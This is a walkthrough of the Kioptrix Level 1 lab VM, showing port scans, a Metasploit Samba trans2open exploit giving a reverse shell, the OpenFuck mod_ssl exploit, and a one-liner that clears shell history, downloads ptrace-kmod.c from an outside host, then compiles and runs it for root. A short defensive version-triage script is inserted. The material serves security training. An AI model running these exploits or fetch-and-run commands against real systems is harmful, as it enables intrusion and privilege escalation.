VulnHub practice box: Kioptrix Level 1

Finding the target's IP

Neither sudo arp-scan nor netdiscover -i eth0 could find the target's IP. Reference fix: in the VM file Kioptix Level 1.vmx, change ethernet0.networkName = "Bridged" to ethernet0.networkName = "Nat".

The target's IP was found to be 192.168.80.15; the scan result from netdiscover -i eth0 is shown in the screenshot.

Further scanning

We use nmap to scan the target's open ports; the results are as follows:

kali@kali:~$ sudo nmap -sS -T5 -Pn 192.168.80.15
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-23 07:20 EST
Nmap scan report for 192.168.80.15
Host is up (0.0017s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
443/tcp open https
1024/tcp open kdm
MAC Address: 00:0C:29:51:2D:92 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.29 seconds

Scan the netbios-ssn service on port 139 with nbtscan:

kali@kali:~$ nbtscan 192.168.80.15
Doing NBT name scan for addresses from 192.168.80.15

IP address NetBIOS Name Server User MAC address
------------------------------------------------------------------------------
192.168.80.15 KIOPTRIX <server> KIOPTRIX 00:00:00:00:00:00

Gathering information with msfconsole

What is Metasploit?
Metasploit is an open-source penetration-testing framework and a steadily maturing platform for vulnerability research and exploit development.

Using the console
service postgresql start //start the database first
msfconsole //launch the framework
msf>help //list the commands msf supports
msf>help search //show the options and usage of the search command
Example: attacking the Metasploitable target
1. search samba: search for modules
2. use multi/samba/usermap_script: select the module
3. show payloads: list the available payloads
4. set payload cmd/unix/bind_netcat: select a payload
5. show options: show the payload's configurable options
6. set RHOST 192.168.0.94: set the payload's target IP
7. exploit: launch the attack
On success a session is created and an interactive shell is returned.
This is the usual workflow for a Metasploit attack.

Scanning the target with Metasploit shows that its Samba version is Samba 2.2.1a. We can exploit this version's vulnerability: Samba Trans2Open Overflow.

kali@kali:~$ msfconsole
[-] ***rting the Metasploit Framework console...|
[-] * WARNING: No database support: No database YAML file
[-] ***


.~+P``````-o+:. -o+:.
.+oooyysyyssyyssyddh++os-````` ``````````````` `
+++++++++++++++++++++++sydhyoyso/:.````...`...-///::+ohhyosyyosyy/+om++:ooo///o
++++///////~~~~///////++++++++++++++++ooyysoyysosso+++++++++++++++++++///oossosy
--.` .-.-...-////+++++++++++++++////////~~//////++++++++++++///
`...............` `...-/////...`


.::::::::::-. .::::::-
.hmMMMMMMMMMMNddds\...//M\\.../hddddmMMMMMMNo
:Nm-/NMMMMMMMMMMMMM$$NMMMMm&&MMMMMMMMMMMMMMy
.sm/`-yMMMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMMMh`
-Nd` :MMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMMh`
-Nh` .yMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMm/
`oo/``-hd: `` .sNd :MMMMMMMMMM$$MMMMMN&&MMMMMMMMMMm/
.yNmMMh//+syysso-`````` -mh` :MMMMMMMMMM$$MMMMMN&&MMMMMMMMMMd
.shMMMMN//dmNMMMMMMMMMMMMs` `:```-o++++oooo+:/ooooo+:+o+++oooo++/
`///omh//dMMMMMMMMMMMMMMMN/:::::/+ooso--/ydh//+s+/ossssso:--syN///os:
/MMMMMMMMMMMMMMMMMMd. `/++-.-yy/...osydh/-+oo:-`o//...oyodh+
-hMMmssddd+:dMMmNMMh. `.-=mmk.//^^^\\.^^`:++:^^o://^^^\\`::
.sMMmo. -dMd--:mN/` ||--X--|| ||--X--||
........../yddy/:...+hmo-...hdd:............\\=v=//............\\=v=//.........
================================================================================
=====================+--------------------------------+=========================
=====================| Session one died of dysentery. |=========================
=====================+--------------------------------+=========================
================================================================================

Press ENTER to size up the situation

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Date: April 25, 1848 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%% Weather: It's always cool in the lab %%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%% Health: Overweight %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%% Caffeine: 12975 mg %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%% Hacked: All the things %%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Press SPACE BAR to continue



=[ metasploit v5.0.71-dev ]
+ -- --=[ 1962 exploits - 1095 auxiliary - 336 post ]
+ -- --=[ 558 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]

msf5 > use auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > show options

Module options (auxiliary/scanner/smb/smb_version):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)

msf5 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.80.15
RHOSTS => 192.168.80.15
msf5 auxiliary(scanner/smb/smb_version) > run

[*] 192.168.80.15:139 - Host could not be identified: Unix (Samba 2.2.1a)
[*] 192.168.80.15:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Exploiting the Samba vulnerability

Here is the detailed description of the Samba vulnerability:

About Samba Trans2Open Overflow –
This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the flaw on x86 Linux systems that do not have the noexec stack option set. NOTE: Some older versions of RedHat do not seem to be vulnerable since they apparently do not allow anonymous access to IPC.

Continue the exploitation with Metasploit:

msf5 auxiliary(scanner/smb/smb_version) > search trans2open # search for this vulnerability

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/freebsd/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (*BSD x86)
1 exploit/linux/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Linux x86)
2 exploit/osx/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Mac OS X PPC)
3 exploit/solaris/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Solaris SPARC)


msf5 auxiliary(scanner/smb/smb_version) > use exploit/linux/samba/trans2open # select the exploit
msf5 exploit(linux/samba/trans2open) > show options

Module options (exploit/linux/samba/trans2open):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 139 yes The target port (TCP)


Exploit target:

Id Name
-- ----
0 Samba 2.2.x - Bruteforce


msf5 exploit(linux/samba/trans2open) > set RHOST 192.168.80.15 # set the target IP
RHOST => 192.168.80.15
msf5 exploit(linux/samba/trans2open) > run # run the exploit

[*] Started reverse TCP handler on 192.168.80.14:4444
[*] 192.168.80.15:139 - Trying return address 0xbffffdfc...
[*] 192.168.80.15:139 - Trying return address 0xbffffcfc...
[*] 192.168.80.15:139 - Trying return address 0xbffffbfc...
[*] 192.168.80.15:139 - Trying return address 0xbffffafc...
[*] Sending stage (985320 bytes) to 192.168.80.15
[*] 192.168.80.15 - Meterpreter session 1 closed. Reason: Died
[*] Meterpreter session 1 opened (192.168.80.14:4444 -> 192.168.80.15:1025) at 2020-02-23 07:38:54 -0500
[*] 192.168.80.15:139 - Trying return address 0xbffff9fc...
[*] Sending stage (985320 bytes) to 192.168.80.15
[*] 192.168.80.15 - Meterpreter session 2 closed. Reason: Died
[*] Meterpreter session 2 opened (127.0.0.1 -> 127.0.0.1) at 2020-02-23 07:38:55 -0500
[*] 192.168.80.15:139 - Trying return address 0xbffff8fc...
[*] Sending stage (985320 bytes) to 192.168.80.15
[*] Meterpreter session 3 opened (192.168.80.14:4444 -> 192.168.80.15:1027) at 2020-02-23 07:38:56 -0500
[*] 192.168.80.15 - Meterpreter session 3 closed. Reason: Died
[*] 192.168.80.15:139 - Trying return address 0xbffff7fc...
[*] Sending stage (985320 bytes) to 192.168.80.15
[*] Meterpreter session 4 opened (192.168.80.14:4444 -> 192.168.80.15:1028) at 2020-02-23 07:38:58 -0500
[*] 192.168.80.15 - Meterpreter session 4 closed. Reason: Died

However, the session closed with "Meterpreter session 4 closed. Reason: Died". This is because we were using the default payload linux/x86/meterpreter/reverse_tcp, so we set a different payload.

msf5 exploit(linux/samba/trans2open) > set payload generic/shell_reverse_tcp # set the payload
payload => generic/shell_reverse_tcp
msf5 exploit(linux/samba/trans2open) > run # run the exploit

[*] Started reverse TCP handler on 192.168.80.14:4444
[*] 192.168.80.15:139 - Trying return address 0xbffffdfc...
[*] 192.168.80.15:139 - Trying return address 0xbffffcfc...
[*] 192.168.80.15:139 - Trying return address 0xbffffbfc...
[*] 192.168.80.15:139 - Trying return address 0xbffffafc...
[*] Command shell session 5 opened (192.168.80.14:4444 -> 192.168.80.15:1029) at 2020-02-23 07:41:48 -0500

We now have a shell on the target.
Type mail, choose 1, and read the author's flag message.

mail
Mail version 8.1 6/6/93. Type ? for help.
"/var/mail/root": 2 messages 1 new 2 unread
U 1 root@kioptix.level1 Sat Sep 26 11:42 15/481 "About Level 2"
>N 2 root@kioptrix.level1 Sun Feb 23 07:55 18/524 "LogWatch for kioptrix"
1
Message 1:
From root Sat Sep 26 11:42:10 2009
Date: Sat, 26 Sep 2009 11:42:10 -0400
From: root <root@kioptix.level1>
To: root@kioptix.level1
Subject: About Level 2

If you are reading this, you got root. Congratulations.
Level 2 won't be as easy...

Exploiting the Apache vulnerability

A detailed nmap port scan shows that the target runs Apache/1.3.20. Searching online shows that this version is exploitable.

kali@kali:~$ sudo nmap -sS -A -n 192.168.80.15
[sudo] password for kali:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-23 07:57 EST
Nmap scan report for 192.168.80.15
Host is up (0.00093s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
| 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
| 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_ 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2020-02-23T14:00:24+00:00; +1h01m50s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_64_WITH_MD5
|_ SSL2_RC4_128_EXPORT40_WITH_MD5
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:51:2D:92 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_clock-skew: 1h01m49s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE
HOP RTT ADDRESS
1 0.93 ms 192.168.80.15

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 128.38 seconds
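As an added defender's-side example (not part of the original walkthrough): a small Python triage script that parses service lines like the scan output above and flags the legacy versions it exposes: Samba inside the 2.2.0 to 2.2.8 trans2open range (the version is supplied separately, taken from the smb_version result, since the nmap banner lacks it), the end-of-life Apache 1.3 / OpenSSL 0.9.6 pair, and the SSHv1, SSLv2 and TRACE findings. The sample input is constructed from this page's scan, and the version thresholds are my assumptions about what an auditor would flag.

```python
import re

# Constructed sample input: service lines taken from the page's `nmap -sS -A` scan, trimmed.
SAMPLE_NMAP = """\
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_  Potentially risky methods: TRACE
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|   SSLv2 supported
"""

SERVICE_RE = re.compile(r"^(\d+)/tcp\s+open\s+\S+\s+(.*)$")

def version_tuple(text):
    """Numeric components of a version string: '2.2.1a' -> (2, 2, 1), '0.9.6b' -> (0, 9, 6)."""
    return tuple(int(n) for n in re.findall(r"\d+", text)[:3])

def samba_in_trans2open_range(version):
    """The trans2open description covers Samba 2.2.0 through 2.2.8 inclusive."""
    return (2, 2, 0) <= version_tuple(version) <= (2, 2, 8)

def triage(nmap_text, samba_version=None):
    """Return (port, finding) pairs for the legacy services the scan output reveals.
    samba_version comes from a separate probe (e.g. smb_version); nmap's banner lacks it."""
    findings, port = [], None
    for line in nmap_text.splitlines():
        m = SERVICE_RE.match(line)
        if m:
            port, banner = int(m.group(1)), m.group(2)
            if "Samba" in banner and samba_version and samba_in_trans2open_range(samba_version):
                findings.append((port, f"Samba {samba_version} is in the trans2open range 2.2.0-2.2.8"))
            apache = re.search(r"Apache(?: httpd)?/?\s*(\d+\.\d+\.\d+)", banner)
            if apache and version_tuple(apache.group(1))[:2] == (1, 3):
                findings.append((port, f"Apache {apache.group(1)} is the end-of-life 1.3 branch"))
            ssl = re.search(r"OpenSSL/(\S+)", banner)
            if ssl and version_tuple(ssl.group(1)) < (0, 9, 7):  # assumed cutoff: 0.9.6 is EOL
                findings.append((port, f"OpenSSL {ssl.group(1)} predates the 0.9.7 branch"))
            continue
        # Script-output lines ("|" / "|_") belong to the most recent service line.
        if port is not None:
            for marker, note in (("SSHv1", "SSHv1 protocol enabled"),
                                 ("SSLv2 supported", "SSLv2 enabled"),
                                 ("risky methods: TRACE", "HTTP TRACE enabled")):
                if marker in line:
                    findings.append((port, note))
    return findings
```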

So we download the exploit script:

kali@kali:~$ wget https://www.exploit-db.com/download/764
--2020-02-23 08:07:28-- https://www.exploit-db.com/download/764
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.8
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.8|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/txt]
Saving to: ‘764’

764 [ <=> ] 32.94K 78.1KB/s in 0.4s

2020-02-23 08:07:33 (78.1 KB/s) - ‘764’ saved [33731]

Compilation fails because the attacking machine is missing openssl.

kali@kali:/tmp$ sudo gcc -o exploit 764.c -lcrypto
764.c:21:10: fatal error: openssl/ssl.h: No such file or directory
21 | #include <openssl/ssl.h>
| ^~~~~~~~~~~~~~~
compilation terminated.

Installing openssl fails:

kali@kali:/tmp$ sudo apt-get install libssl-dev
Reading package lists... Done
Building dependency tree
Reading state information... Done
E: Unable to locate package libssl-dev

Reference for solving the openssl installation problem.
To be continued... Reference walkthroughs:
Detailed steps for exploitation with Metasploit
Detailed steps for exploiting the Apache vulnerability
Install the openssl component: apt-get install libssl1.0-dev
Run the exploit and get a shell on the target:

kali@kali:/tmp$ sudo gcc -o exploit 764.c -lcrypto
kali@kali:/tmp$ ./exploit 0x6b 192.168.80.15 443 -c 40

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8068
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
-o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; p://192.168.80.14/ptrace-kmod.c; gcc
--11:53:36-- http://192.168.80.14/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to 192.168.80.14:80... connected!
HTTP request sent, awaiting response... 404 Not Found
11:53:36 ERROR 404: Not Found.

gcc: ptrace-kmod.c: No such file or directory
gcc: No input files
rm: cannot remove `ptrace-kmod.c': No such file or directory
bash: ./p: No such file or directory
bash-2.05$
bash-2.05$ whoami
whoami
apache

We got a shell, but why is it not root? The reason lies in the ptrace-kmod.c file.
To be continued...
Reference: after getting the shell, enter the command:
unset HISTFILE; cd /tmp; wget http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p;

bash-2.05$ unset HISTFILE; cd /tmp; wget http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; 
exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p;
--12:05:40-- http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:80... connected!
HTTP request sent, awaiting response... 301 Moved Permanently
Location: https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c [following]
--12:05:47-- https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]
0K ... 100% @ 678.26 B/s
12:34:16 (678.26 B/s) - `ptrace-kmod.c' saved [3921/3921]
[+] Attached to 1615
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
whoami
root

Summary

There are two ways to get a shell on this box: one is to exploit the Samba overflow vulnerability and obtain a shell on the target with Metasploit's msfconsole; the other is to exploit the Apache vulnerability and obtain a shell on the target with Metasploit's msfconsole.
The key takeaway from this box is how to use Metasploit to exploit a vulnerability and obtain a reverse shell from the target.
